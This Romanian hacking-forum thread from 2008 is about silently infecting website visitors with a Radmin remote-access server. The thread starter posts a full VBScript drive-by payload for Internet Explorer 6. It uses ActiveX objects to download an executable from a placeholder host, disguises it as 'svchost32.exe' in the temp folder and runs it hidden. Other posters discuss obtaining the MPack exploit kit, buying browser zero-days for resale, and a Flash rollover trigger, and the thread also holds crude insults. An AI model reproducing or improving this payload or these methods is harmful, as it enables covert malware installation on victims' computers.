Petzy Posted February 15, 2008 Report Posted February 15, 2008 Salutari , sunt nou pe forum , imi cer scuze daca am postat la sectiunea gresita mi sa parut cea mai potrivita , vreau sa va imaginati urmatoarele si sa imi ziceti va rog daca se poate face.Am un fisier denumit de exemplu , test.exe , bun. test.exe este un server radmin ultima vers care odata ce ai dat dublu click pe el (nu iti apare nimic , se instaleaza in background) iti instaleaza pe pc serveru de radmin.Pe scurt eu dau acel fisier la victima , acesta il ruleaza si dupaia eu ma pot conecta la calcu lui prin intermediul ip-ului , ok nici o problema aici.Ce vreau eu sa "perfectionez" este metoda de transmitere acestui fisier catre victima.Spre exemplu m-am gandit serile trecute la urmatoarele : sa zicem ca am un website (free) , urc test.exe intr-un folder pe site , sa zicem */test/ , path-ul fiind */test/test.exe bun , totu ok pana aici , pe pagina principala a site-ului pun un buton atractiv (ceva care sa faca pe victima sa dea click pe acel buton, la asta ma descurc) , butonului ii pun un hiperlink catre fisier , ceva de genu http://www.site.com/test/test.exe , vreau sa stiu daca pot face ca atunci cand victima da click pe butonul respectiv , test.exe sa se RULEZE pe pc-ul sau, deci sa nu fie nevoit sa il downlodeze fisierul si sa dea dublu click pe el , ci sa se rulexe direct prin simplul click dat pe acel buton, se poate? stie cineva vreo metoda? Multumesc anticipat eventualelor raspunsuri.ps: am observat pe unele site-uri de warez ca atunci cand accesez site-ul (fara sa dau click pe vreun buton) mi se infecteaza pc-u cu spyware / trojan / etc.(spre exemplu de cel putin 10 ori pe 10 site-uri diferite accesam adresa site-ului dupa care circa 30 de secunde pagina parea blocata si parea ca se incarca , dupa care se incarca calumea si cand intram in C:\ pe HD la mine gaseam virusul , fisierele sale.De aici am presupus ca e posibil ceea ce doresc. ps: stiu sigur ca victimele respective folosesc firefox, opera si ie 7.0 laters versions cu update-uri la zi tot tot ... ms anticipat pt rasplater edit: sau daca e posibil sa nu mai fie nevoie de acel buton ci pur si simplu cand victima intra pe site fisieru sa i se downlodeze pe comp (fara sa vad el asta) si sa se execute singur fisieru (la fel fara sa vada el asta) Quote
Nytro Posted February 15, 2008 Report Posted February 15, 2008 Cred ca se poate decat pe IE6 , Windows fara service pack , sau SP1 nu mai stiu Quote
Petzy Posted February 15, 2008 Author Report Posted February 15, 2008 Cred ca se poate decat pe IE6 , Windows fara service pack , sau SP1 nu mai stiudap am deja scriptul pt ie6 , dar am neaparata nevoie pt ie7 si mozila ie6 e antic . ms oricum de raspuns! Quote
Petzy Posted February 15, 2008 Author Report Posted February 15, 2008 Pentru doritorii de acel script pt IE6 , mi la dat si mie cineva pe alt forum , nu l-am testat pentru ca nu am avut nevoie pt IE6. <script language="VBScript"> on error resume next dl = "http://www.blablasite.com/blabla.exe" Set df = document.createElement("object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP" Set x = df.CreateObject(str,"") a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 str5=str1 set S = df.createobject(str5,"") S.type = 1 str6="GET" x.Open str6, dl, False x.Send fname1="svchost32.exe" set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0 </script> Quote
Petzy Posted February 16, 2008 Author Report Posted February 16, 2008 Ok , am cautat in principal pe google , mpack si am gasit 60 % tutoriale despre nu stiu ce program cu care infectezi mai multe site-uri cu un iframe exploit daca ai user si parola de la ei bla bla , am inteles eu gresit sau ? te rog da`mi mai multe detaliilater edit: ok , cu aproximativ 20 de minute de rabdare m`am prins la ce te referi , prac mpack sunt doua chestii pe net , 1. "mpack, which is a harmless command-line utility for manipulating MIME-encoded messages."si 2.In computer security, MPack is a PHP-based malware kit produced by Russian hackers. The first version was released in December 2006. Since then a new version is thought to have been released roughly every month. It is thought to have been used to infect up to 160,000 PCs with keylogging software. In August 2007 it was believed to have been used in an attack on the web site of the Bank of India which originated from the Russian Business Network.Ok , presupun ca la al doilea te referi , dar e o mica problema , am cautat pe warez / google si sincer nu am gasit nicaieri un download kit. ma poti ajuta? Quote
Petzy Posted February 18, 2008 Author Report Posted February 18, 2008 Hai mai chiar nimeni:( cei din staff nu stiti nici o modalitate?ps: am cautat mpack nu gasesc absolut nicaieri un kit , si sa dau 500 $ - 1000$ nu cred ca mi`ar fi tare profitabil , deci va rog daca stiti alta metoda sa imi spuneti si mie sau daca stiti de unde pot lua mpack sa imi spuneti si mie , mersi anticipat Quote
Guest Nemessis Posted February 18, 2008 Report Posted February 18, 2008 Genul asta de script este foarte periculos si mai mereu mentinut privat. Nu vei gasi pe nimeni care sa iti dea moka asa ceva. Daca gasesti de unde sa cumperi un 0day perfect functionabil la un browser cunoscut cu 500-1000$ zi ca ti-a pus d-zeu mana in cap si cumpara-l pentru ca vei gasi si tu la randul tau cumparatori si iti vei scoate parleala plus inca ceva banuti pe langa. Quote
Petzy Posted February 18, 2008 Author Report Posted February 18, 2008 ce e #RooTeRs Team ?un former irc "team" lame now , popular at the time , are vreo relevanta la ce am intrebat eu in topic? Quote
Petzy Posted February 18, 2008 Author Report Posted February 18, 2008 Genul asta de script este foarte periculos si mai mereu mentinut privat. Nu vei gasi pe nimeni care sa iti dea moka asa ceva. Daca gasesti de unde sa cumperi un 0day perfect functionabil la un browser cunoscut cu 500-1000$ zi ca ti-a pus d-zeu mana in cap si cumpara-l pentru ca vei gasi si tu la randul tau cumparatori si iti vei scoate parleala plus inca ceva banuti pe langa.uhm, deci sa inteleg ca inafara de asta nu cunoasti nici o modalitate ? Quote
MadAgent Posted February 27, 2008 Report Posted February 27, 2008 uhm, deci sa inteleg ca inafara de asta nu cunoasti nici o modalitate ?e o chestie... nu am tot codul... dar pm... din cate am vazut eu... trebuie sa faci fisier *.cab care iti instaleaza automat... descoperisem la un momentdat(anu trecut pe vremea asta cred) si cum sa faci sa-ti intre de pe site... nu era prea greu... dar mi se paruse atunci ca wa... ce am gasit... mai trebuia sa fac ceva... sa fac microsoftu sa creada ca e valabil(adik are permisie de instalare) cabu... am tot citit da n-am gasit nimic... daca tu gasesti cum sa-l faci zi si mie Quote
Petzy Posted February 28, 2008 Author Report Posted February 28, 2008 uhm, deci sa inteleg ca inafara de asta nu cunoasti nici o modalitate ?e o chestie... nu am tot codul... dar pm... din cate am vazut eu... trebuie sa faci fisier *.cab care iti instaleaza automat... descoperisem la un momentdat(anu trecut pe vremea asta cred) si cum sa faci sa-ti intre de pe site... nu era prea greu... dar mi se paruse atunci ca wa... ce am gasit... mai trebuia sa fac ceva... sa fac microsoftu sa creada ca e valabil(adik are permisie de instalare) cabu... am tot citit da n-am gasit nimic... daca tu gasesti cum sa-l faci zi si mie i have no ideea what you just said :shock: , dar pe de o parte nu sunt nici prea experimentat deci e posibil sa ai un oarecare punct de vedere, o sa imi intreb un amic daca stie mai multe si daca reusesc ceva revin cu un raspuns Quote
termopanu Posted February 28, 2008 Report Posted February 28, 2008 i have no ideea what you just said :shock: , dar pe de o parte nu sunt nici prea experimentat deci e posibil sa ai un oarecare punct de vedere, o sa imi intreb un amic daca stie mai multe si daca reusesc ceva revin cu un raspuns Ba gascane vezi ca aici nu esti pe mIRC sa vorbesti in romano-engleza cocalaraceasca si scoate dracu` semnatura aia de gasca constipata cu RooTerS`u pulii. Quote
Petzy Posted February 29, 2008 Author Report Posted February 29, 2008 i have no ideea what you just said :shock: , dar pe de o parte nu sunt nici prea experimentat deci e posibil sa ai un oarecare punct de vedere, o sa imi intreb un amic daca stie mai multe si daca reusesc ceva revin cu un raspuns Ba gascane vezi ca aici nu esti pe mIRC sa vorbesti in romano-engleza cocalaraceasca si scoate dracu` semnatura aia de gasca constipata cu RooTerS`u pulii.incult si deloc matur, nu cred ca e problema ta semnatura mea sau cum vorbesc, este o comunitate in care trebuie sa fim civilizati , ca sa invatam una alta, daca esti asa de incult incat nu poti face diferenta ...termopanule atunci iti sugerez sa o "razi" in alta parte, consider ca am vorbit destul de frumos in posturile mele precedente si nu am jignit.Rog un moderator sa ia masuri , nu cred ca se permit astfel de specimene aici. Quote
termopanu Posted February 29, 2008 Report Posted February 29, 2008 i have no ideea what you just said :shock: , dar pe de o parte nu sunt nici prea experimentat deci e posibil sa ai un oarecare punct de vedere, o sa imi intreb un amic daca stie mai multe si daca reusesc ceva revin cu un raspuns Ba gascane vezi ca aici nu esti pe mIRC sa vorbesti in romano-engleza cocalaraceasca si scoate dracu` semnatura aia de gasca constipata cu RooTerS`u pulii.incult si deloc matur, nu cred ca e problema ta semnatura mea sau cum vorbesc, este o comunitate in care trebuie sa fim civilizati , ca sa invatam una alta, daca esti asa de incult incat nu poti face diferenta ...termopanule atunci iti sugerez sa o "razi" in alta parte, consider ca am vorbit destul de frumos in posturile mele precedente si nu am jignit.Rog un moderator sa ia masuri , nu cred ca se permit astfel de specimene aici.Gascane , ciocu` mic si anusu` largit ! Crezi ca esti la Biserica aici sa zbieri in gura mare ca nu ai de mancare ?PS : Toti Gascanii din RooTers sunteti niste ratati , unu mai gascan ca altu ! Quote
Petzy Posted March 1, 2008 Author Report Posted March 1, 2008 i have no ideea what you just said :shock: , dar pe de o parte nu sunt nici prea experimentat deci e posibil sa ai un oarecare punct de vedere, o sa imi intreb un amic daca stie mai multe si daca reusesc ceva revin cu un raspuns Ba gascane vezi ca aici nu esti pe mIRC sa vorbesti in romano-engleza cocalaraceasca si scoate dracu` semnatura aia de gasca constipata cu RooTerS`u pulii.incult si deloc matur, nu cred ca e problema ta semnatura mea sau cum vorbesc, este o comunitate in care trebuie sa fim civilizati , ca sa invatam una alta, daca esti asa de incult incat nu poti face diferenta ...termopanule atunci iti sugerez sa o "razi" in alta parte, consider ca am vorbit destul de frumos in posturile mele precedente si nu am jignit.Rog un moderator sa ia masuri , nu cred ca se permit astfel de specimene aici.Gascane , ciocu` mic si anusu` largit ! Crezi ca esti la Biserica aici sa zbieri in gura mare ca nu ai de mancare ?PS : Toti Gascanii din RooTers sunteti niste ratati , unu mai gascan ca altu !Eu am impresia ca esti vreun sarantoc care ai avut de a face cu noi pe vremea cand eram in picioare si ne`am batut putin joc de tine anyway daca asta e cazul inseamna ca neam distrat copios pe seama ta , deci multumim de divertisment , din nou ma repet , cu asa limbaj ai sa ramai un privitor tot timpul.ps: imi cer scuze moderatorilor pentru off-topicul creat , nu se va mai repeta.ps2: termopanule , din acesta clipa vei vorbi singur , nu intru in polemicã cu oameni inculti . o seara placuta.ps3: rog ceilalti daca aveti vrei idee sau sugestie la ce am intrebat in acest topic sa posteze , il voi urmari constant , multumesc Quote
bavarezu Posted March 9, 2008 Report Posted March 9, 2008 Ok , presupun ca la al doilea te referi , dar e o mica problema , am cautat pe warez / google si sincer nu am gasit nicaieri un download kit. ma poti ajuta?Daca cererea ta mai e valabila lasa-mi un prv pt MPack kit Quote
Guest Kenpachi Posted March 9, 2008 Report Posted March 9, 2008 Petzy - Banreason : Necitirea regulilor , Postare la sectiunea gresita , EXTREM DE MULTIPLE - Double Posting. Quote
eLegal Posted March 9, 2008 Report Posted March 9, 2008 Ok , presupun ca la al doilea te referi , dar e o mica problema , am cautat pe warez / google si sincer nu am gasit nicaieri un download kit. ma poti ajuta?Daca cererea ta mai e valabila lasa-mi un prv pt MPack kitMPack se poate descarca urmand urmatorul link: ht tp: //ww w.nyx.net/~jlea/coders.zip (am fost nevoit sa pun spatii intre caracterele linkului deoarece nu am inca 3 posturi la activ ca sa pot include linkuri) Quote
Guest Kenpachi Posted March 9, 2008 Report Posted March 9, 2008 ce versiunde de mpack e acolo ? Quote
eLegal Posted March 9, 2008 Report Posted March 9, 2008 acolo e o versiune mai veche care ruleaza in dos (arhiva e scanata cu norton av)Pentru ultima versiune de care stiu o sa postez un link mai tarziu pentru ca inca nu pot posta linkuri si din aceasta cauza imi apar erori..(link cu directionare gresita) Quote
Argentin Posted March 23, 2008 Report Posted March 23, 2008 Daca exista asa ceva eu te pot ajuta in continuare.Imi dai butonul pe care l-ai facut si eu ilmodific in FLash si ii dau fucntiaRollOver adica atunci cand numai trece cu pointerul peste buton asta face o actiune.Este acelasi lucru ca si cand ai da click doar ca in loc sa apesi tu pe buton e nevoie doar de trecere cursorului peste buton. Quote